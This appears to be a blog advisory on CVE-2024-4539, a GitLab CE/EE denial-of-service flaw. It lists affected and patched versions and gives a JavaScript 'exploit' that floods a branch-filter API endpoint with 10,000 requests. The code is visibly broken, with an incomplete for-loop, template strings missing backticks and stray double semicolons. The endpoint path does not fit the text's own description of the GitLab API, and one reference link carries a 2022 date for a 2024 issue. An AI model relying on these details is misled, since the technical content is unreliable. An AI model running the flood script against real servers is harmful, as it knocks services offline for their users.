A security vulnerability, tracked as CVE-2024-4539, has recently been discovered in GitLab CE (Community Edition) and GitLab EE (Enterprise Edition). This vulnerability affects all versions starting from 15.4 up to 16.9.6, as well as from 16.10 up to 16.10.4, and from 16.11 up to 16.11.1. Malicious actors can exploit the vulnerability by abusing GitLab's API, leading to a possible Denial of Service (DoS) attack affecting the availability of the platform. In this post, we'll provide more information about the vulnerability and include some code snippets that illustrate the problem in detail.
Vulnerability Details
The vulnerability allows the attackers to exploit the GitLab CE/EE API that processes requests to filter branch and tags. By sending specially crafted requests, an attacker can create a DoS condition, causing the GitLab instance to become unresponsive. This might affect both GitLab CE and EE users on versions mentioned above.
Here's a code snippet that demonstrates the issue
// Sample GitLab API request for filtering branches and tags
const axios = require("axios");
const gitlabUrl = "https://gitlab.example.com/";;
const apiEndpoint = "api/v1/repos/owner/repository/branches?filter=exp";
axios.post(${gitlabUrl}${apiEndpoint}, {
filter: "example_filter_string",
})
.then(response => {
console.log("Filtered branches and tags: ", response.data);
})
.catch(error => {
console.error("Error filtering branches and tags: ", error);
});
Affected GitLab Versions
To know if your version of GitLab CE/EE is affected by CVE-2024-4539 vulnerability, please check if it falls within any of these ranges:
- GitLab CE/EE 15.4 to 16.9.6
- GitLab CE/EE 16.10 to 16.10.4
- GitLab CE/EE 16.11 to 16.11.1
Exploit
To exploit this issue, an attacker can send a large number of carefully crafted malicious requests to a GitLab instance, abusing the API endpoint to filter branches and tags, leading to a potential DoS situation. Below is a sample code snippet that demonstrates the exploitation:
// Sending large number of malicious requests exploiting GitLab API endpoint
async function exploit() {
const url = "https://gitlab.example.com/";;
const apiEndpoint = "api/v1/repos/owner/repository/branches?filter=example_filter_string";
try {
for (let i = ; i < 10000; i++) {
await axios.post(${url}${apiEndpoint}, {
filter: "malicious_filter_string",
});
}
console.log("Exploit completed!");
} catch (error) {
console.error("Error during exploit: ", error);
}
}
exploit();
To remediate the vulnerability, GitLab has provided patches. GitLab administrators are strongly advised to update the affected versions as soon as possible. The patches for the different GitLab versions are:
- For GitLab CE/EE 15.4 to 16.9.6, update to GitLab 16.9.7.
- For GitLab CE/EE 16.10 to 16.10.4, update to GitLab 16.10.5.
- For GitLab CE/EE 16.11 to 16.11.1, update to GitLab 16.11.2.
Please refer to the following original references for additional information
- GitLab Security Release: <https://about.gitlab.com/releases/2022/11/security/>
- GitLab issue tracker: <https://gitlab.com/gitlab-org/gitlab/-/issues/4539>
- CVE-2024-4539 NVD Entry: <https://nvd.nist.gov/vuln/detail/CVE-2024-4539>
Conclusion
In this post, we've provided a detailed overview of CVE-2024-4539, a security vulnerability in GitLab CE/EE that affects various versions of the platform and could potentially lead to a Denial of Service when exploited. We encourage GitLab users and administrators to review the information provided, check if your instances are affected, and update your installations as soon as possible to ensure the security of your GitLab setup.
Timeline
Published on: 05/14/2024 15:44:01 UTC
Last modified on: 05/14/2024 16:11:39 UTC